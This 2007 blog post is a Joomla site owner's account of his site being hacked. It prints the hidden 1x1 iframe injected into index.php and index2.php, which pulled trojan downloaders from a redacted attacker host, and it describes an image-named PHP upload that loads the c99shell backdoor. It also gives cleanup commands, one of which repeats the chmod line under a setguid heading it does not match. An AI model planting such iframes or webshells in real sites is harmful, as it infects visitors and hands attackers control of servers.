Main Menu

Recommended sites

Add to MyYahoo!
Subscribe in NewsGator Online
Add to Newsburst
Add to Google
Add to My AOL
Add to Pluck
Subscribe in FeedLounge
Add to Windows Live
Add to NetVibes
Subscribe in Rojo
Subscribe in Bloglines
Add to MyMSN
Add to Plusmo for your cellphone
Add to PageFlakes
Add to Technorati
Add to BlinkBits
Got hacked... Print E-mail
User Rating: / 2
PoorBest 
Wednesday, 20 June 2007 19:54
 Everything has started with an email

Trojan-Downloader.VBS.Agent‎
From: Enrique MONTECRISTO ( This e-mail address is being protected from spambots, you need JavaScript enabled to view it )
Sent: Mon 6/18/07 10:04 PM
To: This e-mail address is being protected from spambots, you need JavaScript enabled to view it
   
Hello Cedric,
When I browse your website with Firefox, I get this kind of warning from my GDATA antivirus shield :
http://www.gdata.de/trade/GB/productview/727/16
---------------------------
Virus: Trojan-Downloader.VBS.Agent.u
Adress: stat1count.net
----------------------------
Virus: Trojan-Downloader.JS.Agent.fq
Address: stat1count.net
----------------------------
Is it a fake ?

The "virus" Trojan-Downloader.JS. seems like a malicious javascript inline somewhere in my homepage
Thanks to Firefox WebDeveloper toolbar, it was quite easy to locate the malicious script (View all javascript)

The Hacker was inserting 2 strange line in my content. He has tampered:


 index.php
// displays queries performed for page
if ($mosConfig_debug) {
    echo $database->_ticker . ' queries executed';
    echo '<pre>';
    foreach ($database->_log as $k=>$sql) {
        echo $k+1 . "\n" . $sql . '<hr />';
    }
    echo '</pre>';
}
doGzip();
?>
<iframe width='1' height='1' border='0' frameborder='0' src='http://xxxx.info/stds/go.php?sid=3'></iframe>

AND /index2.php

<html xmlns="http://www.w3.org/1999/xhtml">
        <head>
            <?php echo $mainframe->getHead(); ?>
            <link rel="stylesheet" href="templates/<?php echo $cur_template;?>/css/template_css.css" type="text/css" />
            <link rel="shortcut icon" href="<?php echo $mosConfig_live_site; ?>/images/favicon.ico" />
            <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" />
            <meta name="robots" content="noindex, nofollow" />
            <?php if ($my->id || $mainframe->get( 'joomlaJavascript' )) { ?>
            <script language="JavaScript" src="<?php echo $mosConfig_live_site;?>/includes/js/joomla.javascript.js" type="text/javascript"></script>
            <?php } ?>
        </head>
        <body class="contentpane">
           <iframe width='1' height='1' border='0' frameborder='0' src='http://xxxxx.info/stds/go.php?sid=3'></iframe>
            <?php mosMainBody(); ?>
        </body>
    </html>
    <?php

Which got replace at runtime with
http://xxx.info/stds/pages/default.php
http://xxxxxxx.info/c/2380/counter21.php    

xxxxx.info  I dont want to make publicity to this hacker by publishing his server url here

How to find all place potentialy infected?

return a list of all files with path (-H) that contains the substring xxxxx

# find . -type f  -exec grep -H xxxxx {} \;

How did I get infected?

It seems that the hacker has use my demo site at demo.waltercedric.com to copy an image on the server or replace an existing one which was having bad user rights
It may be an image like this one runme.php.jpg  this image then bootstrap and load a hacker tool c99shell (also known as PHP/C99Shell.A or Backdoor.PHP.C99Shell.c)

PHP/C99Shell-A is a backdoor Trojan for platforms with PHP support, such as web servers. PHP/C99Shell-A listens for commands from a remote user.

How to avoid that next time

No file in apache root must have more than r--r--r-- rights so here is a small scripts that you can crontab or save for periodically check. It automatically change all files to read only for all, group and other

# find . -type f -perm 600 -exec chmod ago=r {} \;

Joomla! is automating during file save the CHMOD, but not on all files in the structure.

Avoid any files with setguid in your apache root
# find . -type f -perm 600 -exec chmod ago=r {} \;

Note:


Comments
Add New Search RSS
Anonymous (85.108.52.xxx) 2008-06-09 15:19:09
SILLY
Reply | Quote
0 0
Write comment
Name:
Email:
 
Title:
UBBCode:
[b] [i] [u] [url] [quote] [code] [img] 
 
:):grin;)8):p:roll:eek:upset:zzz:sigh:?:cry
:(:x
Please input the anti-spam code that you can read in the image.

3.20 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

< Prev   Next >
 

Another articles:


Content View Hits : 2417174

Enter Amount:

demo.waltercedric.com.jpg
demo2.waltercedric.com.jpg
forums.waltercedric.com.jpg
bugs.waltercedric.com.jpg
gallery.waltercedric.com.jpg
wiki.waltercedric.com.jpg

Popular